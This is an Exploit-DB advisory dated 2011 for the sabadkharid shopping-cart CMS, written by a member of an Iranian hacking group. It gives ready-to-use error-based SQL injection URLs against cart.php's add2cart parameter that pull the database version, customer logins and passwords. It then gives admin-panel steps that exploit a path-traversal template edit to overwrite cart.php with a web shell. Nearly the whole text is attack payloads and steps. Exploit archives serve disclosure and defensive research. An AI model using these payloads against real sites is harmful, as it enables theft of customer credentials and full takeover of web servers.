Cart Software - Multiple Vulnerabilities

EDB-ID:

17633

CVE:

N/A

EDB Verified:

Author:

hosinn

Type:

webapps

Exploit:   /  

Platform:

PHP

Date:

2011-08-06

Vulnerable App: 
=========================================================
sabadkharid CMS Multiple Vulnerabilities
=========================================================

# Exploit Title: sabadkharid CMS Multiple Vulnerabilities
# Date: 8/07/2011
# Author: hosinn
# Software Link: http://www.sabadkharid.com
# Version: professional edition
# Platform / Tested on: Multiple
# Category: webapplications
# Code : N/A
# Download Video: http://hosinn.persiangig.com/video/sabadkharid.rar
# BUG Sql Injectin : ###############################################################

1 > cart.php have sql injection bug .

2 > go to http://target.com/cart.php?shopping_cart&add2cart=10'


# Expolite : #######################################################################

1 > get version => http://site.com/cart.php?shopping_cart&add2cart=10 /*!and(select 1 from(select count(*),concat((select (select @@version) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1*/

2 > get username => http://site.com/cart.php?shopping_cart&add2cart=10 /*!and(select 1 from(select count(*),concat((select (select login) from SKH_customers limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1*/

 > output like 'admin1' and username:admin

3 > get password => http://site.com/cart.php?shopping_cart&add2cart=10 /*!and(select 1 from(select count(*),concat((select (select cust_password) from SKH_customers limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1*/

 > output like 'pass1' and username:pass
 
4 > Then Login To Site

# BUG LFI : ######################################################################

1 > Go To Http://site.com/admin.php

2 > Go To Http://site.com/admin.php?tab=conf⊂=template&edit=../../../cart.php

3 > Then Copy Your Shell script & Save

4 > Find Your Shell in Http://site.com/cart.php


#############################################################################
Our Website : http://www.nopotm.ir
Special Thanks to : H-SK33PY , Immortal Boy , BigB4NG , N3td3v!l ,
Blacksun , Drosera^Cqq47 , NOPO , zilli0o0n & all iranian NOPO members
#############################################################################
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services